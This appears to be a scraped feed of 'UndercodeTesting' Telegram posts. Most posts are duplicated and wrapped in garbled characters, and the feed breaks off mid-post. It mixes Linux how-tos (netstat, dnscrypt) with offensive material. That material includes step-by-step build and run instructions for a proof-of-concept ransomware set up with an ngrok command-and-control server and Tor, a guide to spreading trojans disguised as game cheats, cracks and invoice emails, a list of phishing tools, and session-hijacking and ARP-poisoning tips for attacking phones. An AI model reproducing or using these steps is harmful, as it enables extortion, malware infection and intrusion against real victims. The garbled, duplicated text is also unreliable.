β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦How can a Neptune exploit kit distributes Monero miner ?
1) Cybercriminals use the Neptune exploit kit in a malicious miner distribution campaign. This is reported by experts from the firm FireEye. Neptune, also known as Terror, Blaze, and Eris, was originally thought to be a variant of the Sundown exploit kit due to its similarity in code. With the disappearance of kits such as Angler and Neutrino, Sundown also declined in activity, giving way to RIG.
2) However, Neptune has gained popularity and is still used in malicious advertising campaigns, in particular those aimed at distributing cryptocurrency miners. FireEye recently discovered several changes in Neptune attacks, including URI patterns, landing pages, and malicious payload.
3) Attackers use a legitimate pop-up ad service to spread malware. Cybercriminals also disguise their sites by changing the top-level domain from .com to .club (for example, highspirittreks.com and highspirittreks.club). One such malicious site also mimics the YouTube video to MP3 converter.
4) Typically, malicious ads for this campaign are found on popular torrent sites. When a user enters one of these sites, an attempt is made to exploit three vulnerabilities in Internet Explorer and two in Adobe Flash Player. It is noteworthy that none of the exploited vulnerabilities are new, they were all disclosed back in 2014-2016.
5) The miner itself is targeting the Monero cryptocurrency, currently one Monero is $ 86. Countries and continents affected by this pest include: South Korea (29%), Europe (19%), Thailand (13%), the Middle East (13%) and the United States (10%).
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦How can a Neptune exploit kit distributes Monero miner ?
1) Cybercriminals use the Neptune exploit kit in a malicious miner distribution campaign. This is reported by experts from the firm FireEye. Neptune, also known as Terror, Blaze, and Eris, was originally thought to be a variant of the Sundown exploit kit due to its similarity in code. With the disappearance of kits such as Angler and Neutrino, Sundown also declined in activity, giving way to RIG.
2) However, Neptune has gained popularity and is still used in malicious advertising campaigns, in particular those aimed at distributing cryptocurrency miners. FireEye recently discovered several changes in Neptune attacks, including URI patterns, landing pages, and malicious payload.
3) Attackers use a legitimate pop-up ad service to spread malware. Cybercriminals also disguise their sites by changing the top-level domain from .com to .club (for example, highspirittreks.com and highspirittreks.club). One such malicious site also mimics the YouTube video to MP3 converter.
4) Typically, malicious ads for this campaign are found on popular torrent sites. When a user enters one of these sites, an attempt is made to exploit three vulnerabilities in Internet Explorer and two in Adobe Flash Player. It is noteworthy that none of the exploited vulnerabilities are new, they were all disclosed back in 2014-2016.
5) The miner itself is targeting the Monero cryptocurrency, currently one Monero is $ 86. Countries and continents affected by this pest include: South Korea (29%), Europe (19%), Thailand (13%), the Middle East (13%) and the United States (10%).
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦The original crypto- free - Ransomware :))
F E A T U R E S :
Run in Background (or not)
Encrypt files using AES-256-CTR(Counter Mode) with random IV for each file.
Multithreaded.
RSA-4096 to secure the client/server communication.
Includes an Unlocker.
Optional TOR Proxy support.
Use an AES CTR Cypher with stream encryption to avoid load an
entire file into memory.
Walk all drives by default.
Docker image for compilation.
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
First of all download the project outside your $GOPATH:
1) git clone github.com/mauri870/ransomware
2) cd ransomware
If you have Docker skip to the next section.
You need Go at least 1.11.2 with the $GOPATH/bin in your $PATH and $GOROOT pointing to your Go installation folder. For me:
3) export GOPATH=~/gopath
export PATH=$PATH:$GOPATH/bin
export GOROOT=/usr/local/go
4) Build the project require a lot of steps, like the RSA key generation, build three binaries, embed manifest files, so, let's leave make do your job:
make deps
make
5) You can build the server for windows with make -e GOOS=windows.
(Docker
./build-docker.sh make)
6) First of all lets start our external domain:
ngrok http 8080
7) This command will give us a url like http://2af7161c.ngrok.io. Keep this command running otherwise the malware won't reach our server.
Let's compile the binaries (remember to replace the domain):
make -e SERVER_HOST=2af7161c.ngrok.io SERVER_PORT=80 USE_TOR=true
8) The SERVER_PORT needs to be 80 in this case, since ngrok redirects 2af7161c.ngrok.io:80 to your local server port 8080.
After build, a binary called ransomware.exe, and unlocker.exe along with a folder called server will be generated in the bin folder. The execution of ransomware.exe and unlocker.exe (even if you use a diferent GOOS variable during compilation) is locked to windows machines only.
9) Enter the server directory from another terminal and start it:
cd bin/server && ./server --port 8080
10) To make sure that all is working correctly, make a http request to http://2af7161c.ngrok.io:
curl http://2af7161c.ngrok.io
11) If you see a OK and some logs in the server output you are ready to go.
Now move the ransomware.exe and unlocker.exe to the VM along with some dummy files to test the malware. You can take a look at cmd/common.go to see some configuration options like file extensions to match, directories to scan, skipped folders, max size to match a file among others.
12) Then simply run the ransomware.exe and see the magic happens
Verified
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦The original crypto- free - Ransomware :))
F E A T U R E S :
Run in Background (or not)
Encrypt files using AES-256-CTR(Counter Mode) with random IV for each file.
Multithreaded.
RSA-4096 to secure the client/server communication.
Includes an Unlocker.
Optional TOR Proxy support.
Use an AES CTR Cypher with stream encryption to avoid load an
entire file into memory.
Walk all drives by default.
Docker image for compilation.
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
First of all download the project outside your $GOPATH:
1) git clone github.com/mauri870/ransomware
2) cd ransomware
If you have Docker skip to the next section.
You need Go at least 1.11.2 with the $GOPATH/bin in your $PATH and $GOROOT pointing to your Go installation folder. For me:
3) export GOPATH=~/gopath
export PATH=$PATH:$GOPATH/bin
export GOROOT=/usr/local/go
4) Build the project require a lot of steps, like the RSA key generation, build three binaries, embed manifest files, so, let's leave make do your job:
make deps
make
5) You can build the server for windows with make -e GOOS=windows.
(Docker
./build-docker.sh make)
6) First of all lets start our external domain:
ngrok http 8080
7) This command will give us a url like http://2af7161c.ngrok.io. Keep this command running otherwise the malware won't reach our server.
Let's compile the binaries (remember to replace the domain):
make -e SERVER_HOST=2af7161c.ngrok.io SERVER_PORT=80 USE_TOR=true
8) The SERVER_PORT needs to be 80 in this case, since ngrok redirects 2af7161c.ngrok.io:80 to your local server port 8080.
After build, a binary called ransomware.exe, and unlocker.exe along with a folder called server will be generated in the bin folder. The execution of ransomware.exe and unlocker.exe (even if you use a diferent GOOS variable during compilation) is locked to windows machines only.
9) Enter the server directory from another terminal and start it:
cd bin/server && ./server --port 8080
10) To make sure that all is working correctly, make a http request to http://2af7161c.ngrok.io:
curl http://2af7161c.ngrok.io
11) If you see a OK and some logs in the server output you are ready to go.
Now move the ransomware.exe and unlocker.exe to the VM along with some dummy files to test the malware. You can take a look at cmd/common.go to see some configuration options like file extensions to match, directories to scan, skipped folders, max size to match a file among others.
12) Then simply run the ransomware.exe and see the magic happens
Verified
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
GitHub
GitHub - mauri870/ransomware: A POC Windows crypto-ransomware (Academic). Now Ransom:Win32/MauriCrypt.MK!MTB
A POC Windows crypto-ransomware (Academic). Now Ransom:Win32/MauriCrypt.MK!MTB - mauri870/ransomware
TODAY TOPICS :
2020 insta hack
https://t.me/UnderCodeTesting/11731
tcp/ unixsecurity / tcp WRAPPERS / SHELL / LINUXNET
LINUX TWEAK TUTORIALS .HTML
https://t.me/UnderCodeTesting/11732
https://t.me/UnderCodeTesting/11740
Framework designed to automate various wireless networks attacks
https://t.me/UnderCodeTesting/11741
post login box injection in SQLMAP
https://t.me/UnderCodeTesting/11742
NEW TWITTER BOT FOR AUTOMATE
https://t.me/UnderCodeTesting/11744
AI Product Manager Nanodegree legal Course
https://t.me/UnderCodeTesting/11745
OWASP APICheck - DevSecOps Toolkit for HTTP API
https://t.me/UnderCodeTesting/11747
What is the difference between "5G" and "Wi-Fi 6" and how to use them properly?
https://t.me/UnderCodeTesting/11748
Methode for protect yourself from iploggers ?
https://t.me/UnderCodeTesting/11749
Some good New Proxies
https://t.me/UnderCodeTesting/11750
ways to boot Windows 10 in Safe Mode
https://t.me/UnderCodeTesting/11751
Bulletproof Hosting List (2020 Version)
https://t.me/UnderCodeTesting/11752
How to set up and manage log rotation using Logrotate on Linux
https://t.me/UnderCodeTesting/11753
HACK Windows, Linux, macOS or even BSD systems
https://t.me/UnderCodeTesting/11754
How can a Neptune exploit kit distributes Monero miner ?
https://t.me/UnderCodeTesting/11755
The original crypto- free - Ransomwareπ§ββοΈ
https://t.me/UnderCodeTesting/11756
ENJOY β€οΈππ» & USE FOR LEARN !
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
2020 insta hack
https://t.me/UnderCodeTesting/11731
tcp/ unixsecurity / tcp WRAPPERS / SHELL / LINUXNET
LINUX TWEAK TUTORIALS .HTML
https://t.me/UnderCodeTesting/11732
https://t.me/UnderCodeTesting/11733Top reversed eng/ malwares in one repo
https://t.me/UnderCodeTesting/11734
https://t.me/UnderCodeTesting/11735
https://t.me/UnderCodeTesting/11736
https://t.me/UnderCodeTesting/11737
https://t.me/UnderCodeTesting/11738
https://t.me/UnderCodeTesting/11740
Framework designed to automate various wireless networks attacks
https://t.me/UnderCodeTesting/11741
post login box injection in SQLMAP
https://t.me/UnderCodeTesting/11742
NEW TWITTER BOT FOR AUTOMATE
https://t.me/UnderCodeTesting/11744
AI Product Manager Nanodegree legal Course
https://t.me/UnderCodeTesting/11745
OWASP APICheck - DevSecOps Toolkit for HTTP API
https://t.me/UnderCodeTesting/11747
What is the difference between "5G" and "Wi-Fi 6" and how to use them properly?
https://t.me/UnderCodeTesting/11748
Methode for protect yourself from iploggers ?
https://t.me/UnderCodeTesting/11749
Some good New Proxies
https://t.me/UnderCodeTesting/11750
ways to boot Windows 10 in Safe Mode
https://t.me/UnderCodeTesting/11751
Bulletproof Hosting List (2020 Version)
https://t.me/UnderCodeTesting/11752
How to set up and manage log rotation using Logrotate on Linux
https://t.me/UnderCodeTesting/11753
HACK Windows, Linux, macOS or even BSD systems
https://t.me/UnderCodeTesting/11754
How can a Neptune exploit kit distributes Monero miner ?
https://t.me/UnderCodeTesting/11755
The original crypto- free - Ransomwareπ§ββοΈ
https://t.me/UnderCodeTesting/11756
ENJOY β€οΈππ» & USE FOR LEARN !
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦hack passwords and more / Cipher
affineBreaker.py: Break Affine Cipher-encrypted messages.
affineCipher.py: Encrypt and decrypt using the Affine Cipher.
al_sweigart_privkey.txt: A sample private key file that is used by the rsaCipher.py program.
al_sweigart_pubkey.txt: A sample public key file that is used by the rsaCipher.py program.
buggy.py: Used as practice for using Python's debugger.
caesarBreaker.py: Break Caesar Cipher-encrypted messages.
caesarCipher.py: Encrypts and decrypts using the Caesar Cipher.
coinFlips.py: Used as practice for using Python's debugger.
detectEnglish.py: Used to detect if a string is English.
dictionary.txt: A dictionary file of English words, one per line.
encrypted_file.txt: A sample encrypted file from the
frankenstein.txt: A large text file sample. (The public domain novel Frankenstein.)
freqFinder.py: Module for gathering letter frequency statistics.
makeRsaKeys.py: Generate a public/private RSA key pair.
nullBreaker.py: Breaks Null Cipher-encrypted messages.
nullCipher.py: Encrypts and decrypts using the Null Cipher.
primeSieve.py: Generates prime numbers using the Sieve of Erastothenes algorithm
pyperclip.py: A module for copying and pasting to the clipboard. This source code isn't going to be featured in the book, and is only included so that people can test the programs that use it.
rabinMiller.py: Module for primality testing using the Rabin-Miller algorithm.
README.md: The file that you are reading right now, silly. :D
reverseCipher.py: Encrypts with the reverse "cipher", which just reverse the string.
rsaCipher.py: Encrypts and decrypts using the RSA Cipher.
simpleSubBreaker.py: Breaks Simple Substitution Cipher-encrypted messages.
simpleSubCipher.py: Encrypts and decrypts using the Simple Substitution Cipher.
simpleSubKeyword.py: Encrypts and decrypts using the Simple Substitution Cipher, using an English word for the key.
transpositionBreaker.py: Breaks Transposition Cipher-encrypted messages.
transpositionCipherFile.py: Encrypts and decrypts files using the Transposition Cipher.
transpositionDecrypt.py: Decrypts messages using the Transposition Cipher.
transpositionEncrypt.py: Encrypts messages using the Transposition Cipher.
transpositionFileBreaker.py: Breaks Transposition Cipher-encrypted files.
transpositionTest.py: Tests to see if the Transposition Cipher program works.
vigenereBreaker.py: Breaks Vigenere Cipher-encrypted messages.
vigenereCipher.py: Encrypts and decrypts using the Vigenere Cipher.
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) git clone https://github.com/asweigart/codebreaker
2) cd codebreaker
3) choose the python and execute with
> python example..py
4) choose a option and hack
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦hack passwords and more / Cipher
affineBreaker.py: Break Affine Cipher-encrypted messages.
affineCipher.py: Encrypt and decrypt using the Affine Cipher.
al_sweigart_privkey.txt: A sample private key file that is used by the rsaCipher.py program.
al_sweigart_pubkey.txt: A sample public key file that is used by the rsaCipher.py program.
buggy.py: Used as practice for using Python's debugger.
caesarBreaker.py: Break Caesar Cipher-encrypted messages.
caesarCipher.py: Encrypts and decrypts using the Caesar Cipher.
coinFlips.py: Used as practice for using Python's debugger.
detectEnglish.py: Used to detect if a string is English.
dictionary.txt: A dictionary file of English words, one per line.
encrypted_file.txt: A sample encrypted file from the
frankenstein.txt: A large text file sample. (The public domain novel Frankenstein.)
freqFinder.py: Module for gathering letter frequency statistics.
makeRsaKeys.py: Generate a public/private RSA key pair.
nullBreaker.py: Breaks Null Cipher-encrypted messages.
nullCipher.py: Encrypts and decrypts using the Null Cipher.
primeSieve.py: Generates prime numbers using the Sieve of Erastothenes algorithm
pyperclip.py: A module for copying and pasting to the clipboard. This source code isn't going to be featured in the book, and is only included so that people can test the programs that use it.
rabinMiller.py: Module for primality testing using the Rabin-Miller algorithm.
README.md: The file that you are reading right now, silly. :D
reverseCipher.py: Encrypts with the reverse "cipher", which just reverse the string.
rsaCipher.py: Encrypts and decrypts using the RSA Cipher.
simpleSubBreaker.py: Breaks Simple Substitution Cipher-encrypted messages.
simpleSubCipher.py: Encrypts and decrypts using the Simple Substitution Cipher.
simpleSubKeyword.py: Encrypts and decrypts using the Simple Substitution Cipher, using an English word for the key.
transpositionBreaker.py: Breaks Transposition Cipher-encrypted messages.
transpositionCipherFile.py: Encrypts and decrypts files using the Transposition Cipher.
transpositionDecrypt.py: Decrypts messages using the Transposition Cipher.
transpositionEncrypt.py: Encrypts messages using the Transposition Cipher.
transpositionFileBreaker.py: Breaks Transposition Cipher-encrypted files.
transpositionTest.py: Tests to see if the Transposition Cipher program works.
vigenereBreaker.py: Breaks Vigenere Cipher-encrypted messages.
vigenereCipher.py: Encrypts and decrypts using the Vigenere Cipher.
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) git clone https://github.com/asweigart/codebreaker
2) cd codebreaker
3) choose the python and execute with
> python example..py
4) choose a option and hack
β β β Uππ»βΊπ«Δπ¬πβ β β β
GitHub
GitHub - asweigart/codebreaker: "Hacking Secret Ciphers with Python" programs
"Hacking Secret Ciphers with Python" programs. Contribute to asweigart/codebreaker development by creating an account on GitHub.
Wordpress Exploit verified for 5.5.2 version
https://github.com/WordPress/wordpress-develop/commit/d5ddd6d4be1bc9fd16b7796842e6fb26315705ad
https://github.com/WordPress/wordpress-develop/commit/d5ddd6d4be1bc9fd16b7796842e6fb26315705ad
GitHub
Meta: Sanitize meta key before checking protection status. Β· WordPress/wordpress-develop@d5ddd6d
Props zieladam, peterwilsoncc, xknown, whyisjake.
Merges [49377,49381] to trunk.
git-svn-id: https://develop.svn.wordpress.org/trunk@49387 602fd350-edb4-49c9-b593-d223f7449a82
Merges [49377,49381] to trunk.
git-svn-id: https://develop.svn.wordpress.org/trunk@49387 602fd350-edb4-49c9-b593-d223f7449a82
Forwarded from UNDERCODE NEWS
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦#SocialMediaHacking Top Phishing tools:
- SocialFish
- HiddenEye
- Evilginx2
- I-See_You(Get Location using phishing attack)
- SayCheese (Grab target's Webcam Shots)
- QR Code Jacking
- ShellPhish
- BlackPhish
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦#SocialMediaHacking Top Phishing tools:
- SocialFish
- HiddenEye
- Evilginx2
- I-See_You(Get Location using phishing attack)
- SayCheese (Grab target's Webcam Shots)
- QR Code Jacking
- ShellPhish
- BlackPhish
β β β Uππ»βΊπ«Δπ¬πβ β β β
GitHub
GitHub - UndeadSec/SocialFish: Phishing Tool & Information Collector
Phishing Tool & Information Collector . Contribute to UndeadSec/SocialFish development by creating an account on GitHub.
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦π§ How to show dropped packets for a network interface on Linux :
1) Display dropped packets for each interface on Linux using netstat
The netstat command is now deprecated.
2) The ss and ip commands are replacements for netstat.
However, netstat is still available on older Linux distributions.
So I'll start with netstat, but use the ip / ss tools if possible.
3) Syntax:
netstat -i
netstat --interfaces
4) To display summary statistics for each protocol, run:
netstat -s
netstat --statistics
5) Let's show tcp statistics
netstat --statistics --tcp
netstat -s -t
Let's show statistics udp
netstat --statistics --udp
netstat -s -u
6) Displaying dropped packet statistics on a network interface in Linux using IP
7) Let's see how to view the statistics of a network device using the ip command. Syntax:
ip -s link
ip -s link show {interface}
ip -s link show eth0
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦π§ How to show dropped packets for a network interface on Linux :
1) Display dropped packets for each interface on Linux using netstat
The netstat command is now deprecated.
2) The ss and ip commands are replacements for netstat.
However, netstat is still available on older Linux distributions.
So I'll start with netstat, but use the ip / ss tools if possible.
3) Syntax:
netstat -i
netstat --interfaces
4) To display summary statistics for each protocol, run:
netstat -s
netstat --statistics
5) Let's show tcp statistics
netstat --statistics --tcp
netstat -s -t
Let's show statistics udp
netstat --statistics --udp
netstat -s -u
6) Displaying dropped packet statistics on a network interface in Linux using IP
7) Let's see how to view the statistics of a network device using the ip command. Syntax:
ip -s link
ip -s link show {interface}
ip -s link show eth0
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦How viruses Spread :
Trojans masquerading as useful programs are a source of viruses infecting your computer.
The main ways to distribute your Trojan:
1) Protroyan gamer: Go to the gaming forum, well, or a blog where you can leave comments and glue your Trojan with cheats, as they say the profit is good, because gamers turn off their antivirus.
2) The same thing, but gluing with cracks, again comments on forums, torrent trackers, etc. The coverage is great, maybe as they say.
3) Varez music and clips, here the method is quite simple, a shortcut is made, like music / playlist, etc. for example, it runs it, and instead of it the Trojan is launched, well, of course, music / movie can also be launched to divert your eyes. The main thing is to mask your virus so that no one thinks that this is an executable file that will launch the shortcut.
4) Distribution by mail with the extension .src, you can spam by mail like there: "You got an invoice!"
5) Extensions like doc.exe are used less often, but everything is clear here, this is spam for soap, etc.
6) Another good way, this is a miracle program for hacking VKontakte, etc., there are many victims in general.
7) Phishing sites, such as update adob, chrome, etc.
8) Well, the last way, trample the hacker, go for a hack. board and put a cryptor, a stealer, etc. there. with a fucker, you can both in the build and in the builder. In the latter case, someone else will do the job for you. UPD This article was created for informational purposes only. If we missed something, add it in the comments.
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦How viruses Spread :
Trojans masquerading as useful programs are a source of viruses infecting your computer.
The main ways to distribute your Trojan:
1) Protroyan gamer: Go to the gaming forum, well, or a blog where you can leave comments and glue your Trojan with cheats, as they say the profit is good, because gamers turn off their antivirus.
2) The same thing, but gluing with cracks, again comments on forums, torrent trackers, etc. The coverage is great, maybe as they say.
3) Varez music and clips, here the method is quite simple, a shortcut is made, like music / playlist, etc. for example, it runs it, and instead of it the Trojan is launched, well, of course, music / movie can also be launched to divert your eyes. The main thing is to mask your virus so that no one thinks that this is an executable file that will launch the shortcut.
4) Distribution by mail with the extension .src, you can spam by mail like there: "You got an invoice!"
5) Extensions like doc.exe are used less often, but everything is clear here, this is spam for soap, etc.
6) Another good way, this is a miracle program for hacking VKontakte, etc., there are many victims in general.
7) Phishing sites, such as update adob, chrome, etc.
8) Well, the last way, trample the hacker, go for a hack. board and put a cryptor, a stealer, etc. there. with a fucker, you can both in the build and in the builder. In the latter case, someone else will do the job for you. UPD This article was created for informational purposes only. If we missed something, add it in the comments.
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦π‘ How to install dnscrypt proxy with ad blocker on Linux
#REQUESTED
1) Debian/Ubuntu :
$ sudo apt install dnscrypt-proxy
## Alpine Linux
$ sudo apk add dnscrypt-proxy
## CentOS / RHEL ΠΏΠΎΠ»ΡΠ·ΠΎΠ²Π°ΡΠ΅Π»ΠΈ:
$ sudo yum install dnscrypt-proxy
## Arch Linux ΠΈΡΠΏΠΎΠ»ΡΠ·ΡΠΉΡΠ΅ pacman ##
$ sudo pacman -S dnscrypt-proxy
## OpenSUSE/SUSE Linux
$ sudo zypper in dnscrypt-proxy
## Fedora dnf ##
$ sudo dnf install dnscrypt-proxy
Dnscrypt proxy configuration
Edit dnscrypt-proxy.toml in the / etc / dnscrypt-proxy / directory.
> For instance:
$ ls -l /etc/dnscrypt-proxy/
$ sudo vim /etc/dnscrypt-proxy/dnscrypt-proxy.toml
First, we need to set up a list of used servers.
Let's use both Google and Cloudflare:
server_names = [ 'google' 'cloudflare']
I can use cloudflare too:
server_names = [ 'cloudflare']
Configure the list of listening local addresses and ports:
listen_addresses = ['127.0.0.1:53', '[::1]:53']
For my VPN 172.168.0.0/24:
listen_addresses = ['127.0.0.1:53', '172.168.0.1:53' ]
If you have an IPv6 connection, use the servers available over IPv6 (IPv4 by default):
ipv6_servers = true
Make sure we are using servers that implement DNSCrypt and DoH protocol.
dnscrypt_servers = true
doh_servers = true
Make sure we enable DNS cache to reduce latency and outgoing traffic:
cache = true
The server must support DNS Security Extensions (DNSSEC):
require_dnssec = true
Adblock lists consist of one template per line.
Examples of valid patterns:
##
## example.com
## = example.com
## ads. *
## ads * .example. *
## ads * .example [0-9] *. com
Blocking rules file path:
blacklist_file = '/etc/dnscrypt-proxy/blacklist.txt'
Save and close the file.
Installing adblocker list for dnscrypt proxy
Here is a small bash script to download and update the list.
#! / bin / bash
DEST = "/ etc / dnscrypt-proxy / blacklist.txt"
#
# Blocks both adware + malware
# See for other lists https://github.com/StevenBlack/hosts
SRC = "https://raw.githubusercontent.com/StevenBlack/hosts/master/hosts"
TMP_B_FILE = "$ (mktemp)"
TMP_B_FILE_SORTED = "$ (mktemp)"
wget --timeout = 10 --tries = 5 -qO- "$ {SRC}" | grep -Ev "(localhost)" | grep -Ev "#" | sed -E "s / (0.0.0.0 | 127.0.0.1 | 255.255.255.255) //" >> "$ {TMP_B_FILE}"
awk '/ ^ [^ #] / {print $ 1}' "$ {TMP_B_FILE}" | sort -u> "$ {TMP_B_FILE_SORTED}"
cp -f "$ {TMP_B_FILE_SORTED}" "$ DEST"
rm -f "$ {TMP_B_FILE}" "$ {TMP_B_FILE_SORTED}"
Running the script:
# ./update-adblocker.sh
π¦Checking the list:
# more /etc/dnscrypt-proxy/blacklist.txt
Be sure to run the update-adblocker.sh script daily to get an updated list of hosts.
> Add a new cron job like this:
@daily /path/to/update-adblocker.sh
Besides ads and malware , you can block fake news , gambling, porn, and social media !
π¦How to enable dnscrypt proxy service
Use the systemctl command to enable the dnscrypt-proxy service on Linux:
$ sudo systemctl enable dnscrypt-proxy
Service start:
$ sudo systemctl start dnscrypt-proxy
Service check:
$ sudo systemctl status dnscrypt-proxy
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦π‘ How to install dnscrypt proxy with ad blocker on Linux
#REQUESTED
1) Debian/Ubuntu :
$ sudo apt install dnscrypt-proxy
## Alpine Linux
$ sudo apk add dnscrypt-proxy
## CentOS / RHEL ΠΏΠΎΠ»ΡΠ·ΠΎΠ²Π°ΡΠ΅Π»ΠΈ:
$ sudo yum install dnscrypt-proxy
## Arch Linux ΠΈΡΠΏΠΎΠ»ΡΠ·ΡΠΉΡΠ΅ pacman ##
$ sudo pacman -S dnscrypt-proxy
## OpenSUSE/SUSE Linux
$ sudo zypper in dnscrypt-proxy
## Fedora dnf ##
$ sudo dnf install dnscrypt-proxy
Dnscrypt proxy configuration
Edit dnscrypt-proxy.toml in the / etc / dnscrypt-proxy / directory.
> For instance:
$ ls -l /etc/dnscrypt-proxy/
$ sudo vim /etc/dnscrypt-proxy/dnscrypt-proxy.toml
First, we need to set up a list of used servers.
Let's use both Google and Cloudflare:
server_names = [ 'google' 'cloudflare']
I can use cloudflare too:
server_names = [ 'cloudflare']
Configure the list of listening local addresses and ports:
listen_addresses = ['127.0.0.1:53', '[::1]:53']
For my VPN 172.168.0.0/24:
listen_addresses = ['127.0.0.1:53', '172.168.0.1:53' ]
If you have an IPv6 connection, use the servers available over IPv6 (IPv4 by default):
ipv6_servers = true
Make sure we are using servers that implement DNSCrypt and DoH protocol.
dnscrypt_servers = true
doh_servers = true
Make sure we enable DNS cache to reduce latency and outgoing traffic:
cache = true
The server must support DNS Security Extensions (DNSSEC):
require_dnssec = true
Adblock lists consist of one template per line.
Examples of valid patterns:
##
## example.com
## = example.com
## ads. *
## ads * .example. *
## ads * .example [0-9] *. com
Blocking rules file path:
blacklist_file = '/etc/dnscrypt-proxy/blacklist.txt'
Save and close the file.
Installing adblocker list for dnscrypt proxy
Here is a small bash script to download and update the list.
#! / bin / bash
DEST = "/ etc / dnscrypt-proxy / blacklist.txt"
#
# Blocks both adware + malware
# See for other lists https://github.com/StevenBlack/hosts
SRC = "https://raw.githubusercontent.com/StevenBlack/hosts/master/hosts"
TMP_B_FILE = "$ (mktemp)"
TMP_B_FILE_SORTED = "$ (mktemp)"
wget --timeout = 10 --tries = 5 -qO- "$ {SRC}" | grep -Ev "(localhost)" | grep -Ev "#" | sed -E "s / (0.0.0.0 | 127.0.0.1 | 255.255.255.255) //" >> "$ {TMP_B_FILE}"
awk '/ ^ [^ #] / {print $ 1}' "$ {TMP_B_FILE}" | sort -u> "$ {TMP_B_FILE_SORTED}"
cp -f "$ {TMP_B_FILE_SORTED}" "$ DEST"
rm -f "$ {TMP_B_FILE}" "$ {TMP_B_FILE_SORTED}"
Running the script:
# ./update-adblocker.sh
π¦Checking the list:
# more /etc/dnscrypt-proxy/blacklist.txt
Be sure to run the update-adblocker.sh script daily to get an updated list of hosts.
> Add a new cron job like this:
@daily /path/to/update-adblocker.sh
Besides ads and malware , you can block fake news , gambling, porn, and social media !
π¦How to enable dnscrypt proxy service
Use the systemctl command to enable the dnscrypt-proxy service on Linux:
$ sudo systemctl enable dnscrypt-proxy
Service start:
$ sudo systemctl start dnscrypt-proxy
Service check:
$ sudo systemctl status dnscrypt-proxy
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
GitHub
GitHub - StevenBlack/hosts: π Consolidating and extending hosts files from several well-curated sources. Optionally pick extensionsβ¦
π Consolidating and extending hosts files from several well-curated sources. Optionally pick extensions for porn, social media, and other categories. - StevenBlack/hosts
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦HACK PHONE ON SAME NETWORK - BY IP :
1) ONE of the flashy method can be session hijacking .
In computer science, session hijacking, sometimes also known as cookie hijacking is the exploitation of a valid computer sessionβsometimes also called a session keyβto gain unauthorized access to information or services in a computer system. You can view their contents over the network if they arenβt using https protocol .
2) This hack doesnβt need password , just capture ethernet packets using any packet capture tools like ferret(kali linux ) and then analyse it with session analyzing tool like (hamster).This way you need not access their device and can know lots of things .
3) Other conventional methods can be sending payloads , arp-poisoning , password-bruteforcing .
Even evil-twin attack may work wonders.
will post methodes related to this next
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦HACK PHONE ON SAME NETWORK - BY IP :
1) ONE of the flashy method can be session hijacking .
In computer science, session hijacking, sometimes also known as cookie hijacking is the exploitation of a valid computer sessionβsometimes also called a session keyβto gain unauthorized access to information or services in a computer system. You can view their contents over the network if they arenβt using https protocol .
2) This hack doesnβt need password , just capture ethernet packets using any packet capture tools like ferret(kali linux ) and then analyse it with session analyzing tool like (hamster).This way you need not access their device and can know lots of things .
3) Other conventional methods can be sending payloads , arp-poisoning , password-bruteforcing .
Even evil-twin attack may work wonders.
will post methodes related to this next
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦What is a random number generator?
1) The random number generator (RNG) is the modern equivalent of rolling dice or shuffling cards.
2) This form of randomization has now been mathematically transformed into a computer algorithm that works to generate a set of random numbers that (should) be free of any pattern.
3) When it comes to casino games, lotteries, sweepstakes and similar games, RNGs take the form of blocks of code hidden in software that provide a "chance" in gambling.
π¦Random RNG and Pseudo RNG
RNGs in casino games and slot machines are actually not random, but rather "pseudo".
1) The difference between the two is determined by the ways in which the numbers are generated.
2) In the case of a radial RNG, number generation is usually a completely unpredictable physical phenomenon (such as radio or atmospheric noise), fueled by entropy and explained only by quantum mechanics.
3) N Sevda RNG, on the other hand, using a mathematical algorithm or otherwise generated by a computer.
4) The key difference is that with the help of computer algorithms the entire result could be technically predicted if all the initial values ββwere known.
Hence ... "pseudo".
As in everything related to mathematics, if there is an equation, then it is not at all random.
π¦So, is it possible to hack an RNG?
Random number generators are quite complex.
As you can see, they include complex mathematical code that is hidden in software, encrypted, and hidden in computers monitored by CCTV cameras.
You must be a complete WRONG.. if you think you can hack the Random Number Generator.
In fact, you really only need a small piece of information to crack this code.
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦What is a random number generator?
1) The random number generator (RNG) is the modern equivalent of rolling dice or shuffling cards.
2) This form of randomization has now been mathematically transformed into a computer algorithm that works to generate a set of random numbers that (should) be free of any pattern.
3) When it comes to casino games, lotteries, sweepstakes and similar games, RNGs take the form of blocks of code hidden in software that provide a "chance" in gambling.
π¦Random RNG and Pseudo RNG
RNGs in casino games and slot machines are actually not random, but rather "pseudo".
1) The difference between the two is determined by the ways in which the numbers are generated.
